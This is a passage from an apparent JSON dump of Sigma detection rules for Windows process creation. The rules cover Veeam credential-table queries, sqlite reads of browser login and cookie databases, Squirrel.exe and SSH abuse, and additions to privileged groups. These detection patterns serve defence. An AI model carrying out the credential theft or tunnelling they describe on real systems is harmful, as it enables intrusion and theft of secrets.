    "content": "title: Veeam Backup Database Suspicious Query\nid: 696bfb54-227e-4602-ac5b-30d9d2053312\nstatus: test\ndescription: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sql:\n        Image|endswith: '\\sqlcmd.exe'\n        CommandLine|contains|all:\n            - 'VeeamBackup'\n            - 'From '\n    selection_db:\n        CommandLine|contains:\n            - 'BackupRepositories'\n            - 'Backups'\n            - 'Credentials'\n            - 'HostCreds'\n            - 'SmbFileShares'\n            - 'Ssh_creds'\n            - 'VSphereInfo'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml",
    "content": "title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE\nid: b57ba453-b384-4ab9-9f40-1038086b4e53\nstatus: test\ndescription: Detects dump of credentials in VeeamBackup dbo\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\n    - https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html\nauthor: frack113\ndate: 2021-12-20\nmodified: 2023-02-13\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools:\n        Image|endswith: '\\sqlcmd.exe'\n    selection_query:\n        CommandLine|contains|all:\n            - 'SELECT'\n            - 'TOP'\n            - '[VeeamBackup].[dbo].[Credentials]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml",
    "content": "title: SQLite Chromium Profile Data DB Access\nid: 24c77512-782b-448a-8950-eddb0785fc71\nstatus: test\ndescription: Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows\n    - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/\nauthor: TropChaud\ndate: 2022-12-19\nmodified: 2023-01-19\ntags:\n    - attack.credential-access\n    - attack.t1539\n    - attack.t1555.003\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sql:\n        - Product: SQLite\n        - Image|endswith:\n              - '\\sqlite.exe'\n              - '\\sqlite3.exe'\n    selection_chromium:\n        CommandLine|contains:\n            - '\\User Data\\' # Most common folder for user profile data among Chromium browsers\n            - '\\Opera Software\\' # Opera\n            - '\\ChromiumViewer\\' # Sleipnir (Fenrir)\n    selection_data:\n        CommandLine|contains:\n            - 'Login Data' # Passwords\n            - 'Cookies'\n            - 'Web Data' # Credit cards, autofill data\n            - 'History'\n            - 'Bookmarks'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml",
    "content": "title: SQLite Firefox Profile Data DB Access\nid: 4833155a-4053-4c9c-a997-777fcea0baa7\nstatus: test\ndescription: Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows\n    - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/\nauthor: frack113\ndate: 2022-04-08\nmodified: 2023-01-19\ntags:\n    - attack.credential-access\n    - attack.t1539\n    - attack.collection\n    - attack.t1005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sql:\n        - Product: SQLite\n        - Image|endswith:\n              - '\\sqlite.exe'\n              - '\\sqlite3.exe'\n    selection_firefox:\n        CommandLine|contains:\n            - 'cookies.sqlite'\n            - 'places.sqlite' # Bookmarks, history\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_squirrel_download.yml",
    "content": "title: Arbitrary File Download Via Squirrel.EXE\nid: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c\nrelated:\n    - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e\n      type: similar\n    - id: fa4b21c9-0057-4493-b289-2556416ae4d7\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the usage of the \"Squirrel.exe\" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/\n    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\nauthor: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2022-06-09\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\squirrel.exe'\n            - '\\update.exe'\n    selection_download_cli:\n        CommandLine|contains:\n            - ' --download '\n            - ' --update '\n            - ' --updateRollback='\n    selection_download_http_keyword:\n        CommandLine|contains: 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml",
    "content": "title: Process Proxy Execution Via Squirrel.EXE\nid: 45239e6a-b035-4aaf-b339-8ad379fcb67e\nrelated:\n    - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c\n      type: similar\n    - id: fa4b21c9-0057-4493-b289-2556416ae4d7\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the usage of the \"Squirrel.exe\" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/\n    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\nauthor: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2022-06-09\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\squirrel.exe'\n            - '\\update.exe'\n    selection_exec:\n        CommandLine|contains:\n            - '--processStart'\n            - '--processStartAndWait'\n            - '--createShortcut'\n    filter_optional_discord:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Discord\\Update.exe'\n            - 'Discord.exe'\n        CommandLine|contains:\n            - '--createShortcut'\n            - '--processStart'\n    filter_optional_github_desktop:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\Update.exe'\n            - 'GitHubDesktop.exe'\n        CommandLine|contains:\n            - '--createShortcut'\n            - '--processStartAndWait'\n    filter_optional_teams:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n            - 'Teams.exe'\n        CommandLine|contains:\n            - '--processStart'\n            - '--createShortcut'\n    filter_optional_yammer:\n        CommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\yammerdesktop\\Update.exe'\n            - 'Yammer.exe'\n        CommandLine|contains:\n            - '--processStart'\n            - '--createShortcut'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml",
    "content": "title: Port Forwarding Activity Via SSH.EXE\nid: 327f48c1-a6db-4eb8-875a-f6981f1b0183\nstatus: test\ndescription: Detects port forwarding activity via SSH.exe\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-12\nmodified: 2024-03-05\ntags:\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1572\n    - attack.t1021.001\n    - attack.t1021.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ssh.exe'\n        CommandLine|contains|windash: ' -R '\n    condition: selection\nfalsepositives:\n    - Administrative activity using a remote port forwarding to a local port\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml",
    "content": "title: Program Executed Using Proxy/Local Command Via SSH.EXE\nid: 7d6d30b8-5b91-4b90-a891-46cccaf29598\nstatus: test\ndescription: Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ssh/\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/211/files\n    - https://gtfobins.github.io/gtfobins/ssh/\n    - https://man.openbsd.org/ssh_config#ProxyCommand\n    - https://man.openbsd.org/ssh_config#LocalCommand\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-12-29\nmodified: 2025-10-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        # ParentCommandLine: '\"C:\\Windows\\System32\\OpenSSH\\sshd.exe\" -R'\n        ParentImage: 'C:\\Windows\\System32\\OpenSSH\\sshd.exe'\n    selection_cli_img:\n        - Image|endswith: '\\ssh.exe'\n        - Product: 'OpenSSH for Windows'\n        - Hashes|contains:\n              - 'IMPHASH=55b4964d29aad5438b9e950052dbbbc0'\n              - 'IMPHASH=334d66c33503ccbf647c15b47c27eef4'\n              - 'IMPHASH=27b0da080ef92afb37983d30d839141e'\n              - 'IMPHASH=977eb4c263d384e47daa0712d34713ab'\n              - 'IMPHASH=3eaadce9ae43d5a918bb082065815c3b'\n              - 'IMPHASH=980fe6cf0d996ab1eedf877222e722aa'\n              - 'IMPHASH=5f959422308ac3d721010d66647e100e'\n              - 'IMPHASH=a49aaa3d03d1cd9c8dc7fca60f7f480b'\n              - 'IMPHASH=dd335f759b6d5d6a8382b71dd9d65791'\n    selection_cli_flags:\n        - CommandLine|contains: 'ProxyCommand='\n        - CommandLine|contains|all:\n              - 'PermitLocalCommand=yes'\n              - ' LocalCommand'\n    condition: selection_parent or all of selection_cli_*\nfalsepositives:\n    - Legitimate usage for administration purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml",
    "content": "title: Potential RDP Tunneling Via SSH\nid: f7d7ebd5-a016-46e2-9c54-f9932f2d386d\nrelated:\n    - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da # plink.exe\n      type: similar\nstatus: test\ndescription: Execution of ssh.exe to perform data exfiltration and tunneling through RDP\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-12\nmodified: 2023-01-25\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ssh.exe'\n        CommandLine|contains: ':3389'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml",
    "content": "title: Potential Amazon SSM Agent Hijacking\nid: d20ee2f4-822c-4827-9e15-41500b1fff10\nstatus: test\ndescription: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.\nreferences:\n    - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan\n    - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/\n    - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/\nauthor: Muhammad Faisal\ndate: 2023-08-02\ntags:\n    - attack.command-and-control\n    - attack.persistence\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\amazon-ssm-agent.exe'\n        CommandLine|contains|all:\n            - '-register '\n            - '-code '\n            - '-id '\n            - '-region '\n    condition: selection\nfalsepositives:\n    - Legitimate activity of system administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml",
    "content": "title: Execution via stordiag.exe\nid: 961e0abb-1b1e-4c84-a453-aafe56ad0d34\nstatus: test\ndescription: Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html\n    - https://twitter.com/eral4m/status/1451112385041911809\nauthor: Austin Songer (@austinsonger)\ndate: 2021-10-21\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\stordiag.exe'\n        Image|endswith:\n            - '\\schtasks.exe'\n            - '\\systeminfo.exe'\n            - '\\fltmc.exe'\n    filter:\n        ParentImage|startswith: # as first is \"Copy c:\\windows\\system32\\stordiag.exe to a folder\"\n            - 'c:\\windows\\system32\\'\n            - 'c:\\windows\\syswow64\\'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate usage of stordiag.exe.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml",
    "content": "title: Start of NT Virtual DOS Machine\nid: 16905e21-66ee-42fe-b256-1318ada2d770\nstatus: test\ndescription: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications\nreferences:\n    - https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\n    - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7\n    - https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/\n    - https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/\nauthor: frack113\ndate: 2022-07-16\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\ntvdm.exe'\n            - '\\csrstub.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml",
    "content": "title: Abused Debug Privilege by Arbitrary Parent Processes\nid: d522eca2-2973-4391-a3e0-ef0374321dae\nstatus: test\ndescription: Detection of unusual child processes by different system processes\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg\nauthor: 'Semanur Guneysu @semanurtg, oscd.community'\ndate: 2020-10-28\nmodified: 2022-11-11\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\winlogon.exe'\n            - '\\services.exe'\n            - '\\lsass.exe'\n            - '\\csrss.exe'\n            - '\\smss.exe'\n            - '\\wininit.exe'\n            - '\\spoolsv.exe'\n            - '\\searchindexer.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\cmd.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'Cmd.Exe'\n    filter:\n        CommandLine|contains|all:\n            - ' route '\n            - ' ADD '\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml",
    "content": "title: User Added to Local Administrators Group\nid: ad720b90-25ad-43ff-9b5e-5c841facc8e5\nrelated:\n    - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups\n      type: similar\n    - id: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups\n      type: similar\nstatus: test\ndescription: Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".\nreferences:\n    - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-03-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        - CommandLine|contains|all:\n              # net.exe\n              - 'localgroup '\n              - ' /add'\n        - CommandLine|contains|all:\n              # powershell.exe\n              - 'Add-LocalGroupMember '\n              - ' -Group '\n    selection_group:\n        CommandLine|contains:\n            - ' administrators '\n            - ' administrateur' # Typo without an 'S' so we catch both\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml",
    "content": "title: User Added To Highly Privileged Group\nid: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups\nrelated:\n    - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups\n      type: similar\n    - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups\n      type: similar\nstatus: test\ndescription: Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        - CommandLine|contains|all:\n              # net.exe\n              - 'localgroup '\n              - ' /add'\n        - CommandLine|contains|all:\n              # powershell.exe\n              - 'Add-LocalGroupMember '\n              - ' -Group '\n    selection_group:\n        CommandLine|contains:\n            - 'Group Policy Creator Owners'\n            - 'Schema Admins'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity that must be investigated\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml",
    "content": "title: User Added to Remote Desktop Users Group\nid: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e\nrelated:\n    - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups\n      type: similar\n    - id: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups\n      type: similar\nstatus: test\ndescription: Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".\nreferences:\n    - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-06\nmodified: 2022-09-09\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.lateral-movement\n    - attack.t1133\n    - attack.t1136.001\n    - attack.t1021.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        - CommandLine|contains|all:\n              - 'localgroup '\n              - ' /add'\n        - CommandLine|contains|all:\n              - 'Add-LocalGroupMember '\n              - ' -Group '\n    selection_group:\n        CommandLine|contains:\n            - 'Remote Desktop Users'\n            - 'Utilisateurs du Bureau à distance' # French for \"Remote Desktop Users\"\n            - 'Usuarios de escritorio remoto' # Spanish for \"Remote Desktop Users\"\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml",
    "content": "title: Execute From Alternate Data Streams\nid: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c\nstatus: test\ndescription: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nauthor: frack113\ndate: 2021-09-01\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_stream:\n        CommandLine|contains: 'txt:'\n    selection_tools_type:\n        CommandLine|contains|all:\n            - 'type '\n            - ' > '\n    selection_tools_makecab:\n        CommandLine|contains|all:\n            - 'makecab '\n            - '.cab'\n    selection_tools_reg:\n        CommandLine|contains|all:\n            - 'reg '\n            - ' export '\n    selection_tools_regedit:\n        CommandLine|contains|all:\n            - 'regedit '\n            - ' /E '\n    selection_tools_esentutl:\n        CommandLine|contains|all:\n            - 'esentutl '\n            - ' /y '\n            - ' /d '\n            - ' /o '\n    condition: selection_stream and (1 of selection_tools_*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml",
    "content": "title: Always Install Elevated Windows Installer\nid: cd951fdc-4b2f-47f5-ba99-a33bf61e3770\nstatus: test\ndescription: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020-10-13\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_image_1:\n        Image|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        Image|endswith: 'tmp'\n    selection_image_2:\n        Image|endswith: '\\msiexec.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    filter_installer:\n        ParentImage: 'C:\\Windows\\System32\\services.exe'\n    filter_repair:\n        - CommandLine|endswith: '\\system32\\msiexec.exe /V' # ignore \"repair option\"\n        - ParentCommandLine|endswith: '\\system32\\msiexec.exe /V' # ignore \"repair option\"\n    filter_sophos:\n        ParentImage|startswith: 'C:\\ProgramData\\Sophos\\'\n    filter_avira:\n        ParentImage|startswith: 'C:\\ProgramData\\Avira\\'\n    filter_avast:\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Avast Software\\'\n            - 'C:\\Program Files (x86)\\Avast Software\\'\n    filter_google_update:\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Google\\Update\\'\n            - 'C:\\Program Files (x86)\\Google\\Update\\'\n    condition: 1 of selection_image_* and selection_user and not 1 of filter_*\nfalsepositives:\n    - System administrator usage\n    - Anti virus products\n    - WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml",
    "content": "title: Potentially Suspicious Windows App Activity\nid: f91ed517-a6ba-471d-9910-b3b4a398c0f3\nstatus: test\ndescription: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution\nreferences:\n    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-12\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        # GrandParentImage|endswith: '\\sihost.exe'\n        ParentImage|contains: 'C:\\Program Files\\WindowsApps\\'\n    selection_susp_img:\n        Image|endswith:\n            # You can add more LOLBINs\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    selection_susp_cli:\n        # You can add more potentially suspicious keywords\n        CommandLine|contains:\n            - 'cmd /c'\n            - 'Invoke-'\n            - 'Base64'\n    filter_optional_terminal:\n        ParentImage|contains: ':\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal'\n        ParentImage|endswith: '\\WindowsTerminal.exe'\n        # Note: to avoid FP add the default shells and profiles that your WT integrates\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\cmd.exe'\n            - '\\pwsh.exe'\n    filter_optional_sysinternals:\n        ParentImage|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite'\n        Image|endswith: '\\cmd.exe'\n    condition: selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate packages that make use of external binaries such as Windows Terminal\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml",
    "content": "title: Arbitrary Shell Command Execution Via Settingcontent-Ms\nid: 24de4f3b-804c-4165-b442-5a06a2302c7e\nstatus: test\ndescription: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.\nreferences:\n    - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39\nauthor: Sreeman\ndate: 2020-03-13\nmodified: 2022-04-14\ntags:\n    - attack.t1204\n    - attack.t1566.001\n    - attack.execution\n    - attack.initial-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '.SettingContent-ms'\n    filter:\n        CommandLine|contains: 'immersivecontrolpanel'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml",
    "content": "title: Phishing Pattern ISO in Archive\nid: fcdf69e5-a3d3-452a-9724-26f2308bf2b1\nstatus: test\ndescription: Detects cases in which an ISO file is opened within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)\nreferences:\n    - https://twitter.com/1ZRR4H/status/1534259727059787783\n    - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-07\ntags:\n    - attack.initial-access\n    - attack.t1566\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\Winrar.exe'\n            - '\\7zFM.exe'\n            - '\\peazip.exe'\n        Image|endswith:\n            - '\\isoburn.exe'\n            - '\\PowerISO.exe'\n            - '\\ImgBurn.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml",
    "content": "title: Automated Collection Command Prompt\nid: f576a613-2392-4067-9d1a-9345fb58d8d1\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2021-07-28\nmodified: 2022-11-11\ntags:\n    - attack.collection\n    - attack.t1119\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ext:\n        CommandLine|contains:\n            - '.doc'\n            - '.docx'\n            - '.xls'\n            - '.xlsx'\n            - '.ppt'\n            - '.pptx'\n            - '.rtf'\n            - '.pdf'\n            - '.txt'\n    selection_other_dir:\n        CommandLine|contains|all:\n            - 'dir '\n            - ' /b '\n            - ' /s '\n    selection_other_findstr:\n        OriginalFileName: 'FINDSTR.EXE'\n        CommandLine|contains:\n            - ' /e '\n            - ' /si '\n    condition: selection_ext and 1 of selection_other_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml",
